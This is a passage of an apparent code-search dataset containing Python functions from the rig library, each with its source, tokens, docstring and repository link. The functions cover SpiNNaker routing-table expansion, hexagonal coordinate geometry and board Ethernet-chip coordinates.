case, any entries which are covered (i.e. unreachable) in the input
table will be omitted and a warning produced. As a result, all output
routing tables are guaranteed to be orthogonal.
Parameters
----------
entries : [:py:class:`~rig.routing_table.RoutingTableEntry`...] or similar
The entries to expand.
Other Parameters
----------------
ignore_xs : int
Mask of bits in which Xs should not be expanded. If None (the default)
then Xs which are common to all entries will not be expanded.
Yields
------
:py:class:`~rig.routing_table.RoutingTableEntry`
Routing table entries which represent the original entries but with all
Xs not masked off by `ignore_xs` replaced with 1s and 0s.
"""
# Find the common Xs for the entries
if ignore_xs is None:
ignore_xs = get_common_xs(entries)
# Keep track of keys that we've seen
seen_keys = set({})
# Expand each entry in turn
for entry in entries:
for new_entry in expand_entry(entry, ignore_xs):
if new_entry.key in seen_keys:
# We've already used this key, warn that the table is
# over-complete.
warnings.warn("Table is not orthogonal: Key {:#010x} matches "
"multiple entries.".format(new_entry.key))
else:
# Mark the key as seen and yield the new entry
seen_keys.add(new_entry.key)
yield new_entry | python | def expand_entries(entries, ignore_xs=None):
"""Turn all Xs which are not ignored in all entries into ``0`` s and
``1`` s.
For example::
>>> from rig.routing_table import RoutingTableEntry
>>> entries = [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100), # 01XX
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b0010), # XX1X
... ]
>>> list(expand_entries(entries)) == [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1110), # 010X
... RoutingTableEntry(set(), 0b0110, 0xfffffff0 | 0b1110), # 011X
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b1110), # 001X
... RoutingTableEntry(set(), 0b1010, 0xfffffff0 | 0b1110), # 101X
... RoutingTableEntry(set(), 0b1110, 0xfffffff0 | 0b1110), # 111X
... ]
True
Note that the ``X`` in the LSB was retained because it is common to all
entries.
Any duplicated entries will be removed (in this case the first and second
entries will both match ``0000``, so when the second entry is expanded only
one entry is retained)::
>>> from rig.routing_table import Routes
>>> entries = [
... RoutingTableEntry({Routes.north}, 0b0000, 0b1111), # 0000 -> N
... RoutingTableEntry({Routes.south}, 0b0000, 0b1011), # 0X00 -> S
... ]
>>> list(expand_entries(entries)) == [
... RoutingTableEntry({Routes.north}, 0b0000, 0b1111), # 0000 -> N
... RoutingTableEntry({Routes.south}, 0b0100, 0b1111), # 0100 -> S
... ]
True
.. warning::
It is assumed that the input routing table is orthogonal (i.e., there
are no two entries which would match the same key). If this is not the
case, any entries which are covered (i.e. unreachable) in the input
table will be omitted and a warning produced. As a result, all output
routing tables are guaranteed to be orthogonal.
Parameters
----------
entries : [:py:class:`~rig.routing_table.RoutingTableEntry`...] or similar
The entries to expand.
Other Parameters
----------------
ignore_xs : int
Mask of bits in which Xs should not be expanded. If None (the default)
then Xs which are common to all entries will not be expanded.
Yields
------
:py:class:`~rig.routing_table.RoutingTableEntry`
Routing table entries which represent the original entries but with all
Xs not masked off by `ignore_xs` replaced with 1s and 0s.
"""
# Find the common Xs for the entries
if ignore_xs is None:
ignore_xs = get_common_xs(entries)
# Keep track of keys that we've seen
seen_keys = set({})
# Expand each entry in turn
for entry in entries:
for new_entry in expand_entry(entry, ignore_xs):
if new_entry.key in seen_keys:
# We've already used this key, warn that the table is
# over-complete.
warnings.warn("Table is not orthogonal: Key {:#010x} matches "
"multiple entries.".format(new_entry.key))
else:
# Mark the key as seen and yield the new entry
seen_keys.add(new_entry.key)
yield new_entry | [
"def",
"expand_entries",
"(",
"entries",
",",
"ignore_xs",
"=",
"None",
")",
":",
"# Find the common Xs for the entries",
"if",
"ignore_xs",
"is",
"None",
":",
"ignore_xs",
"=",
"get_common_xs",
"(",
"entries",
")",
"# Keep a track of keys that we've seen",
"seen_keys",
"=",
"set",
"(",
"{",
"}",
")",
"# Expand each entry in turn",
"for",
"entry",
"in",
"entries",
":",
"for",
"new_entry",
"in",
"expand_entry",
"(",
"entry",
",",
"ignore_xs",
")",
":",
"if",
"new_entry",
".",
"key",
"in",
"seen_keys",
":",
"# We've already used this key, warn that the table is",
"# over-complete.",
"warnings",
".",
"warn",
"(",
"\"Table is not orthogonal: Key {:#010x} matches \"",
"\"multiple entries.\"",
".",
"format",
"(",
"new_entry",
".",
"key",
")",
")",
"else",
":",
"# Mark the key as seen and yield the new entry",
"seen_keys",
".",
"add",
"(",
"new_entry",
".",
"key",
")",
"yield",
"new_entry"
] | Turn all Xs which are not ignored in all entries into ``0`` s and
``1`` s.
For example::
>>> from rig.routing_table import RoutingTableEntry
>>> entries = [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100), # 01XX
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b0010), # XX1X
... ]
>>> list(expand_entries(entries)) == [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1110), # 010X
... RoutingTableEntry(set(), 0b0110, 0xfffffff0 | 0b1110), # 011X
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b1110), # 001X
... RoutingTableEntry(set(), 0b1010, 0xfffffff0 | 0b1110), # 101X
... RoutingTableEntry(set(), 0b1110, 0xfffffff0 | 0b1110), # 111X
... ]
True
Note that the ``X`` in the LSB was retained because it is common to all
entries.
Any duplicated entries will be removed (in this case the first and second
entries will both match ``0000``, so when the second entry is expanded only
one entry is retained)::
>>> from rig.routing_table import Routes
>>> entries = [
... RoutingTableEntry({Routes.north}, 0b0000, 0b1111), # 0000 -> N
... RoutingTableEntry({Routes.south}, 0b0000, 0b1011), # 0X00 -> S
... ]
>>> list(expand_entries(entries)) == [
... RoutingTableEntry({Routes.north}, 0b0000, 0b1111), # 0000 -> N
... RoutingTableEntry({Routes.south}, 0b0100, 0b1111), # 0100 -> S
... ]
True
.. warning::
It is assumed that the input routing table is orthogonal (i.e., there
are no two entries which would match the same key). If this is not the
case, any entries which are covered (i.e. unreachable) in the input
table will be omitted and a warning produced. As a result, all output
routing tables are guaranteed to be orthogonal.
Parameters
----------
entries : [:py:class:`~rig.routing_table.RoutingTableEntry`...] or similar
The entries to expand.
Other Parameters
----------------
ignore_xs : int
Mask of bits in which Xs should not be expanded. If None (the default)
then Xs which are common to all entries will not be expanded.
Yields
------
:py:class:`~rig.routing_table.RoutingTableEntry`
Routing table entries which represent the original entries but with all
Xs not masked off by `ignore_xs` replaced with 1s and 0s. | [
"Turn",
"all",
"Xs",
"which",
"are",
"not",
"ignored",
"in",
"all",
"entries",
"into",
"0",
"s",
"and",
"1",
"s",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L285-L366 |
project-rig/rig | rig/routing_table/utils.py | get_common_xs | def get_common_xs(entries):
"""Return a mask of where there are Xs in all routing table entries.
For example ``01XX`` and ``XX1X`` have common Xs in the LSB only; for this
input this method would return ``0b0001``::
>>> from rig.routing_table import RoutingTableEntry
>>> entries = [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100), # 01XX
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b0010), # XX1X
... ]
>>> print("{:#06b}".format(get_common_xs(entries)))
0b0001
"""
# Determine where there are never 1s in the key and mask
key = 0x00000000
mask = 0x00000000
for entry in entries:
key |= entry.key
mask |= entry.mask
# Where there are never 1s in the key or the mask there are Xs which are
# common to all entries.
return (~(key | mask)) & 0xffffffff | python | def get_common_xs(entries):
"""Return a mask of where there are Xs in all routing table entries.
For example ``01XX`` and ``XX1X`` have common Xs in the LSB only; for this
input this method would return ``0b0001``::
>>> from rig.routing_table import RoutingTableEntry
>>> entries = [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100), # 01XX
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b0010), # XX1X
... ]
>>> print("{:#06b}".format(get_common_xs(entries)))
0b0001
"""
# Determine where there are never 1s in the key and mask
key = 0x00000000
mask = 0x00000000
for entry in entries:
key |= entry.key
mask |= entry.mask
# Where there are never 1s in the key or the mask there are Xs which are
# common to all entries.
return (~(key | mask)) & 0xffffffff | [
"def",
"get_common_xs",
"(",
"entries",
")",
":",
"# Determine where there are never 1s in the key and mask",
"key",
"=",
"0x00000000",
"mask",
"=",
"0x00000000",
"for",
"entry",
"in",
"entries",
":",
"key",
"|=",
"entry",
".",
"key",
"mask",
"|=",
"entry",
".",
"mask",
"# Where there are never 1s in the key or the mask there are Xs which are",
"# common to all entries.",
"return",
"(",
"~",
"(",
"key",
"|",
"mask",
")",
")",
"&",
"0xffffffff"
] | Return a mask of where there are Xs in all routing table entries.
For example ``01XX`` and ``XX1X`` have common Xs in the LSB only; for this
input this method would return ``0b0001``::
>>> from rig.routing_table import RoutingTableEntry
>>> entries = [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100), # 01XX
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b0010), # XX1X
... ]
>>> print("{:#06b}".format(get_common_xs(entries)))
0b0001 | [
"Return",
"a",
"mask",
"of",
"where",
"there",
"are",
"Xs",
"in",
"all",
"routing",
"table",
"entries",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L369-L393 |
project-rig/rig | rig/place_and_route/allocate/utils.py | slices_overlap | def slices_overlap(slice_a, slice_b):
"""Test if the ranges covered by a pair of slices overlap."""
assert slice_a.step is None
assert slice_b.step is None
return max(slice_a.start, slice_b.start) \
< min(slice_a.stop, slice_b.stop) | python | def slices_overlap(slice_a, slice_b):
"""Test if the ranges covered by a pair of slices overlap."""
assert slice_a.step is None
assert slice_b.step is None
return max(slice_a.start, slice_b.start) \
< min(slice_a.stop, slice_b.stop) | [
"def",
"slices_overlap",
"(",
"slice_a",
",",
"slice_b",
")",
":",
"assert",
"slice_a",
".",
"step",
"is",
"None",
"assert",
"slice_b",
".",
"step",
"is",
"None",
"return",
"max",
"(",
"slice_a",
".",
"start",
",",
"slice_b",
".",
"start",
")",
"<",
"min",
"(",
"slice_a",
".",
"stop",
",",
"slice_b",
".",
"stop",
")"
] | Test if the ranges covered by a pair of slices overlap. | [
"Test",
"if",
"the",
"ranges",
"covered",
"by",
"a",
"pair",
"of",
"slices",
"overlap",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/allocate/utils.py#L4-L10 |
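A quick usage sketch with plain Python slice objects (both slices must have a step of None, per the assertions above):
print(slices_overlap(slice(0, 5), slice(3, 8)))  # True: [3, 5) is shared
print(slices_overlap(slice(0, 5), slice(5, 8)))  # False: the ranges only touch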
project-rig/rig | rig/geometry.py | minimise_xyz | def minimise_xyz(xyz):
"""Minimise an (x, y, z) coordinate."""
x, y, z = xyz
m = max(min(x, y), min(max(x, y), z))
return (x-m, y-m, z-m) | python | def minimise_xyz(xyz):
"""Minimise an (x, y, z) coordinate."""
x, y, z = xyz
m = max(min(x, y), min(max(x, y), z))
return (x-m, y-m, z-m) | [
"def",
"minimise_xyz",
"(",
"xyz",
")",
":",
"x",
",",
"y",
",",
"z",
"=",
"xyz",
"m",
"=",
"max",
"(",
"min",
"(",
"x",
",",
"y",
")",
",",
"min",
"(",
"max",
"(",
"x",
",",
"y",
")",
",",
"z",
")",
")",
"return",
"(",
"x",
"-",
"m",
",",
"y",
"-",
"m",
",",
"z",
"-",
"m",
")"
] | Minimise an (x, y, z) coordinate. | [
"Minimise",
"an",
"(",
"x",
"y",
"z",
")",
"coordinate",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L19-L23 |
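The expression for `m` computes the median of the three components, so the minimised coordinate always has at least one zero component, the usual normal form for hexagonal (x, y, z) coordinates. For example:
print(minimise_xyz((1, 2, 3)))  # (-1, 0, 1): the median, 2, becomes 0
print(minimise_xyz((4, 4, 4)))  # (0, 0, 0)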
project-rig/rig | rig/geometry.py | concentric_hexagons | def concentric_hexagons(radius, start=(0, 0)):
"""A generator which produces coordinates of concentric rings of hexagons.
Parameters
----------
radius : int
Number of layers to produce (0 is just one hexagon)
start : (x, y)
The coordinate of the central hexagon.
"""
x, y = start
yield (x, y)
for r in range(1, radius + 1):
# Move to the next layer
y -= 1
# Walk around the hexagon of this radius
for dx, dy in [(1, 1), (0, 1), (-1, 0), (-1, -1), (0, -1), (1, 0)]:
for _ in range(r):
yield (x, y)
x += dx
y += dy | python | def concentric_hexagons(radius, start=(0, 0)):
"""A generator which produces coordinates of concentric rings of hexagons.
Parameters
----------
radius : int
Number of layers to produce (0 is just one hexagon)
start : (x, y)
The coordinate of the central hexagon.
"""
x, y = start
yield (x, y)
for r in range(1, radius + 1):
# Move to the next layer
y -= 1
# Walk around the hexagon of this radius
for dx, dy in [(1, 1), (0, 1), (-1, 0), (-1, -1), (0, -1), (1, 0)]:
for _ in range(r):
yield (x, y)
x += dx
y += dy | [
"def",
"concentric_hexagons",
"(",
"radius",
",",
"start",
"=",
"(",
"0",
",",
"0",
")",
")",
":",
"x",
",",
"y",
"=",
"start",
"yield",
"(",
"x",
",",
"y",
")",
"for",
"r",
"in",
"range",
"(",
"1",
",",
"radius",
"+",
"1",
")",
":",
"# Move to the next layer",
"y",
"-=",
"1",
"# Walk around the hexagon of this radius",
"for",
"dx",
",",
"dy",
"in",
"[",
"(",
"1",
",",
"1",
")",
",",
"(",
"0",
",",
"1",
")",
",",
"(",
"-",
"1",
",",
"0",
")",
",",
"(",
"-",
"1",
",",
"-",
"1",
")",
",",
"(",
"0",
",",
"-",
"1",
")",
",",
"(",
"1",
",",
"0",
")",
"]",
":",
"for",
"_",
"in",
"range",
"(",
"r",
")",
":",
"yield",
"(",
"x",
",",
"y",
")",
"x",
"+=",
"dx",
"y",
"+=",
"dy"
] | A generator which produces coordinates of concentric rings of hexagons.
Parameters
----------
radius : int
Number of layers to produce (0 is just one hexagon)
start : (x, y)
The coordinate of the central hexagon. | [
"A",
"generator",
"which",
"produces",
"coordinates",
"of",
"concentric",
"rings",
"of",
"hexagons",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L215-L235 |
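A radius-1 usage sketch: the centre hexagon followed by its ring of six neighbours, in the coordinate system used above:
print(list(concentric_hexagons(1)))
# [(0, 0), (0, -1), (1, 0), (1, 1), (0, 1), (-1, 0), (-1, -1)]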
project-rig/rig | rig/geometry.py | standard_system_dimensions | def standard_system_dimensions(num_boards):
"""Calculate the standard network dimensions (in chips) for a full torus
system with the specified number of SpiNN-5 boards.
Returns
-------
(w, h)
Width and height of the network in chips.
Standard SpiNNaker systems are constructed as squarely as possible
given the number of boards available. When a square system cannot be
made, the function prefers wider systems over taller systems.
Raises
------
ValueError
If the number of boards is not a multiple of three.
"""
# Special case to avoid division by 0
if num_boards == 0:
return (0, 0)
# Special case: meaningful systems with 1 board can exist
if num_boards == 1:
return (8, 8)
if num_boards % 3 != 0:
raise ValueError("{} is not a multiple of 3".format(num_boards))
# Find the largest pair of factors to discover the squarest system in terms
# of triads of boards.
for h in reversed( # pragma: no branch
range(1, int(sqrt(num_boards // 3)) + 1)):
if (num_boards // 3) % h == 0:
break
w = (num_boards // 3) // h
# Convert the number of triads into numbers of chips (each triad of boards
# contributes a 12x12 block of chips).
return (w * 12, h * 12) | python | def standard_system_dimensions(num_boards):
"""Calculate the standard network dimensions (in chips) for a full torus
system with the specified number of SpiNN-5 boards.
Returns
-------
(w, h)
Width and height of the network in chips.
Standard SpiNNaker systems are constructed as squarely as possible
given the number of boards available. When a square system cannot be
made, the function prefers wider systems over taller systems.
Raises
------
ValueError
If the number of boards is not a multiple of three.
"""
# Special case to avoid division by 0
if num_boards == 0:
return (0, 0)
# Special case: meaningful systems with 1 board can exist
if num_boards == 1:
return (8, 8)
if num_boards % 3 != 0:
raise ValueError("{} is not a multiple of 3".format(num_boards))
# Find the largest pair of factors to discover the squarest system in terms
# of triads of boards.
for h in reversed( # pragma: no branch
range(1, int(sqrt(num_boards // 3)) + 1)):
if (num_boards // 3) % h == 0:
break
w = (num_boards // 3) // h
# Convert the number of triads into numbers of chips (each triad of boards
# contributes a 12x12 block of chips).
return (w * 12, h * 12) | [
"def",
"standard_system_dimensions",
"(",
"num_boards",
")",
":",
"# Special case to avoid division by 0",
"if",
"num_boards",
"==",
"0",
":",
"return",
"(",
"0",
",",
"0",
")",
"# Special case: meaningful systems with 1 board can exist",
"if",
"num_boards",
"==",
"1",
":",
"return",
"(",
"8",
",",
"8",
")",
"if",
"num_boards",
"%",
"3",
"!=",
"0",
":",
"raise",
"ValueError",
"(",
"\"{} is not a multiple of 3\"",
".",
"format",
"(",
"num_boards",
")",
")",
"# Find the largest pair of factors to discover the squarest system in terms",
"# of triads of boards.",
"for",
"h",
"in",
"reversed",
"(",
"# pragma: no branch",
"range",
"(",
"1",
",",
"int",
"(",
"sqrt",
"(",
"num_boards",
"//",
"3",
")",
")",
"+",
"1",
")",
")",
":",
"if",
"(",
"num_boards",
"//",
"3",
")",
"%",
"h",
"==",
"0",
":",
"break",
"w",
"=",
"(",
"num_boards",
"//",
"3",
")",
"//",
"h",
"# Convert the number of triads into numbers of chips (each triad of boards",
"# contributes as 12x12 block of chips).",
"return",
"(",
"w",
"*",
"12",
",",
"h",
"*",
"12",
")"
] | Calculate the standard network dimensions (in chips) for a full torus
system with the specified number of SpiNN-5 boards.
Returns
-------
(w, h)
Width and height of the network in chips.
Standard SpiNNaker systems are constructed as squarely as possible
given the number of boards available. When a square system cannot be
made, the function prefers wider systems over taller systems.
Raises
------
ValueError
If the number of boards is not a multiple of three. | [
"Calculate",
"the",
"standard",
"network",
"dimensions",
"(",
"in",
"chips",
")",
"for",
"a",
"full",
"torus",
"system",
"with",
"the",
"specified",
"number",
"of",
"SpiNN",
"-",
"5",
"boards",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L238-L278 |
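A few worked examples of the sizing rule (values traced by hand from the function above):
print(standard_system_dimensions(1))   # (8, 8): single-board special case
print(standard_system_dimensions(3))   # (12, 12): one triad of boards
print(standard_system_dimensions(6))   # (24, 12): wider preferred over taller
print(standard_system_dimensions(24))  # (48, 24): 8 triads arranged 4 x 2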
project-rig/rig | rig/geometry.py | spinn5_eth_coords | def spinn5_eth_coords(width, height, root_x=0, root_y=0):
"""Generate a list of board coordinates with Ethernet connectivity in a
SpiNNaker machine.
Specifically, generates the coordinates for the Ethernet connected chips of
SpiNN-5 boards arranged in a standard torus topology.
.. warning::
In general, applications should use
:py:class:`rig.machine_control.MachineController.get_system_info` and
:py:meth:`~rig.machine_control.machine_controller.SystemInfo.ethernet_connected_chips`
to gather the coordinates of Ethernet connected chips which are
actually functioning. For example::
>> from rig.machine_control import MachineController
>> mc = MachineController("my-machine")
>> si = mc.get_system_info()
>> print(list(si.ethernet_connected_chips()))
[((0, 0), "1.2.3.4"), ((4, 8), "1.2.3.5"), ((8, 4), "1.2.3.6")]
Parameters
----------
width, height : int
Width and height of the system in chips.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
"""
# In oddly-shaped machines where chip (0, 0) does not exist, we must offset
# the coordinates returned in accordance with the root chip's location.
root_x %= 12
root_y %= 12
# Internally, work with the width and height rounded up to the next
# multiple of 12
w = ((width + 11) // 12) * 12
h = ((height + 11) // 12) * 12
for x in range(0, w, 12):
for y in range(0, h, 12):
for dx, dy in ((0, 0), (4, 8), (8, 4)):
nx = (x + dx + root_x) % w
ny = (y + dy + root_y) % h
# Skip points which are outside the range available
if nx < width and ny < height:
yield (nx, ny) | python | def spinn5_eth_coords(width, height, root_x=0, root_y=0):
"""Generate a list of board coordinates with Ethernet connectivity in a
SpiNNaker machine.
Specifically, generates the coordinates for the Ethernet connected chips of
SpiNN-5 boards arranged in a standard torus topology.
.. warning::
In general, applications should use
:py:class:`rig.machine_control.MachineController.get_system_info` and
:py:meth:`~rig.machine_control.machine_controller.SystemInfo.ethernet_connected_chips`
to gather the coordinates of Ethernet connected chips which are
actually functioning. For example::
>> from rig.machine_control import MachineController
>> mc = MachineController("my-machine")
>> si = mc.get_system_info()
>> print(list(si.ethernet_connected_chips()))
[((0, 0), "1.2.3.4"), ((4, 8), "1.2.3.5"), ((8, 4), "1.2.3.6")]
Parameters
----------
width, height : int
Width and height of the system in chips.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
"""
# In oddly-shaped machines where chip (0, 0) does not exist, we must offset
# the coordinates returned in accordance with the root chip's location.
root_x %= 12
root_y %= 12
# Internally, work with the width and height rounded up to the next
# multiple of 12
w = ((width + 11) // 12) * 12
h = ((height + 11) // 12) * 12
for x in range(0, w, 12):
for y in range(0, h, 12):
for dx, dy in ((0, 0), (4, 8), (8, 4)):
nx = (x + dx + root_x) % w
ny = (y + dy + root_y) % h
# Skip points which are outside the range available
if nx < width and ny < height:
yield (nx, ny) | [
"def",
"spinn5_eth_coords",
"(",
"width",
",",
"height",
",",
"root_x",
"=",
"0",
",",
"root_y",
"=",
"0",
")",
":",
"# In oddly-shaped machines where chip (0, 0) does not exist, we must offset",
"# the coordinates returned in accordance with the root chip's location.",
"root_x",
"%=",
"12",
"root_x",
"%=",
"12",
"# Internally, work with the width and height rounded up to the next",
"# multiple of 12",
"w",
"=",
"(",
"(",
"width",
"+",
"11",
")",
"//",
"12",
")",
"*",
"12",
"h",
"=",
"(",
"(",
"height",
"+",
"11",
")",
"//",
"12",
")",
"*",
"12",
"for",
"x",
"in",
"range",
"(",
"0",
",",
"w",
",",
"12",
")",
":",
"for",
"y",
"in",
"range",
"(",
"0",
",",
"h",
",",
"12",
")",
":",
"for",
"dx",
",",
"dy",
"in",
"(",
"(",
"0",
",",
"0",
")",
",",
"(",
"4",
",",
"8",
")",
",",
"(",
"8",
",",
"4",
")",
")",
":",
"nx",
"=",
"(",
"x",
"+",
"dx",
"+",
"root_x",
")",
"%",
"w",
"ny",
"=",
"(",
"y",
"+",
"dy",
"+",
"root_y",
")",
"%",
"h",
"# Skip points which are outside the range available",
"if",
"nx",
"<",
"width",
"and",
"ny",
"<",
"height",
":",
"yield",
"(",
"nx",
",",
"ny",
")"
] | Generate a list of board coordinates with Ethernet connectivity in a
SpiNNaker machine.
Specifically, generates the coordinates for the Ethernet connected chips of
SpiNN-5 boards arranged in a standard torus topology.
.. warning::
In general, applications should use
:py:class:`rig.machine_control.MachineController.get_system_info` and
:py:meth:`~rig.machine_control.machine_controller.SystemInfo.ethernet_connected_chips`
to gather the coordinates of Ethernet connected chips which are
actually functioning. For example::
>> from rig.machine_control import MachineController
>> mc = MachineController("my-machine")
>> si = mc.get_system_info()
>> print(list(si.ethernet_connected_chips()))
[((0, 0), "1.2.3.4"), ((4, 8), "1.2.3.5"), ((8, 4), "1.2.3.6")]
Parameters
----------
width, height : int
Width and height of the system in chips.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`. | [
"Generate",
"a",
"list",
"of",
"board",
"coordinates",
"with",
"Ethernet",
"connectivity",
"in",
"a",
"SpiNNaker",
"machine",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L281-L328 |
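For the common three-board (12x12) torus booted from chip (0, 0), the generator yields exactly the three standard Ethernet chip positions:
print(sorted(spinn5_eth_coords(12, 12)))
# [(0, 0), (4, 8), (8, 4)]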
project-rig/rig | rig/geometry.py | spinn5_local_eth_coord | def spinn5_local_eth_coord(x, y, w, h, root_x=0, root_y=0):
"""Get the coordinates of a chip's local ethernet connected chip.
Returns the coordinates of the ethernet connected chip on the same board as
the supplied chip.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
.. warning::
In general, applications should interrogate the machine to determine
which Ethernet connected chip is considered 'local' to a particular
SpiNNaker chip, e.g. using
:py:class:`rig.machine_control.MachineController.get_system_info`::
>> from rig.machine_control import MachineController
>> mc = MachineController("my-machine")
>> si = mc.get_system_info()
>> print(si[(3, 2)].local_ethernet_chip)
(0, 0)
:py:func:`.spinn5_local_eth_coord` will always produce the coordinates
of the Ethernet-connected SpiNNaker chip on the same SpiNN-5 board as
the supplied chip. In future versions of the low-level system software,
some other method of choosing local Ethernet connected chips may be
used.
Parameters
----------
x, y : int
Chip whose coordinates are of interest.
w, h : int
Width and height of the system in chips.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
"""
dx, dy = SPINN5_ETH_OFFSET[(y - root_y) % 12][(x - root_x) % 12]
return ((x + int(dx)) % w), ((y + int(dy)) % h) | python | def spinn5_local_eth_coord(x, y, w, h, root_x=0, root_y=0):
"""Get the coordinates of a chip's local ethernet connected chip.
Returns the coordinates of the ethernet connected chip on the same board as
the supplied chip.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
.. warning::
In general, applications should interrogate the machine to determine
which Ethernet connected chip is considered 'local' to a particular
SpiNNaker chip, e.g. using
:py:class:`rig.machine_control.MachineController.get_system_info`::
>> from rig.machine_control import MachineController
>> mc = MachineController("my-machine")
>> si = mc.get_system_info()
>> print(si[(3, 2)].local_ethernet_chip)
(0, 0)
:py:func:`.spinn5_local_eth_coord` will always produce the coordinates
of the Ethernet-connected SpiNNaker chip on the same SpiNN-5 board as
the supplied chip. In future versions of the low-level system software,
some other method of choosing local Ethernet connected chips may be
used.
Parameters
----------
x, y : int
Chip whose coordinates are of interest.
w, h : int
Width and height of the system in chips.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
"""
dx, dy = SPINN5_ETH_OFFSET[(y - root_y) % 12][(x - root_x) % 12]
return ((x + int(dx)) % w), ((y + int(dy)) % h) | [
"def",
"spinn5_local_eth_coord",
"(",
"x",
",",
"y",
",",
"w",
",",
"h",
",",
"root_x",
"=",
"0",
",",
"root_y",
"=",
"0",
")",
":",
"dx",
",",
"dy",
"=",
"SPINN5_ETH_OFFSET",
"[",
"(",
"y",
"-",
"root_y",
")",
"%",
"12",
"]",
"[",
"(",
"x",
"-",
"root_x",
")",
"%",
"12",
"]",
"return",
"(",
"(",
"x",
"+",
"int",
"(",
"dx",
")",
")",
"%",
"w",
")",
",",
"(",
"(",
"y",
"+",
"int",
"(",
"dy",
")",
")",
"%",
"h",
")"
] | Get the coordinates of a chip's local ethernet connected chip.
Returns the coordinates of the ethernet connected chip on the same board as
the supplied chip.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
.. warning::
In general, applications should interrogate the machine to determine
which Ethernet connected chip is considered 'local' to a particular
SpiNNaker chip, e.g. using
:py:class:`rig.machine_control.MachineController.get_system_info`::
>> from rig.machine_control import MachineController
>> mc = MachineController("my-machine")
>> si = mc.get_system_info()
>> print(si[(3, 2)].local_ethernet_chip)
(0, 0)
:py:func:`.spinn5_local_eth_coord` will always produce the coordinates
of the Ethernet-connected SpiNNaker chip on the same SpiNN-5 board as
the supplied chip. In future versions of the low-level system software,
some other method of choosing local Ethernet connected chips may be
used.
Parameters
----------
x, y : int
Chip whose coordinates are of interest.
w, h : int
Width and height of the system in chips.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`. | [
"Get",
"the",
"coordinates",
"of",
"a",
"chip",
"s",
"local",
"ethernet",
"connected",
"chip",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L331-L371 |
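Assuming the module's precomputed SPINN5_ETH_OFFSET table is available, the docstring's example can be reproduced directly; chip (3, 2) sits on the board whose Ethernet-connected chip is (0, 0):
print(spinn5_local_eth_coord(3, 2, 12, 12))  # (0, 0)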
project-rig/rig | rig/geometry.py | spinn5_chip_coord | def spinn5_chip_coord(x, y, root_x=0, root_y=0):
"""Get the coordinates of a chip on its board.
Given the coordinates of a chip in a multi-board system, calculates the
coordinates of the chip within its board.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
Parameters
----------
x, y : int
The coordinates of the chip of interest
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
"""
dx, dy = SPINN5_ETH_OFFSET[(y - root_y) % 12][(x - root_x) % 12]
return (-int(dx), -int(dy)) | python | def spinn5_chip_coord(x, y, root_x=0, root_y=0):
"""Get the coordinates of a chip on its board.
Given the coordinates of a chip in a multi-board system, calculates the
coordinates of the chip within its board.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
Parameters
----------
x, y : int
The coordinates of the chip of interest
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
"""
dx, dy = SPINN5_ETH_OFFSET[(y - root_y) % 12][(x - root_x) % 12]
return (-int(dx), -int(dy)) | [
"def",
"spinn5_chip_coord",
"(",
"x",
",",
"y",
",",
"root_x",
"=",
"0",
",",
"root_y",
"=",
"0",
")",
":",
"dx",
",",
"dy",
"=",
"SPINN5_ETH_OFFSET",
"[",
"(",
"y",
"-",
"root_y",
")",
"%",
"12",
"]",
"[",
"(",
"x",
"-",
"root_x",
")",
"%",
"12",
"]",
"return",
"(",
"-",
"int",
"(",
"dx",
")",
",",
"-",
"int",
"(",
"dy",
")",
")"
] | Get the coordinates of a chip on its board.
Given the coordinates of a chip in a multi-board system, calculates the
coordinates of the chip within its board.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
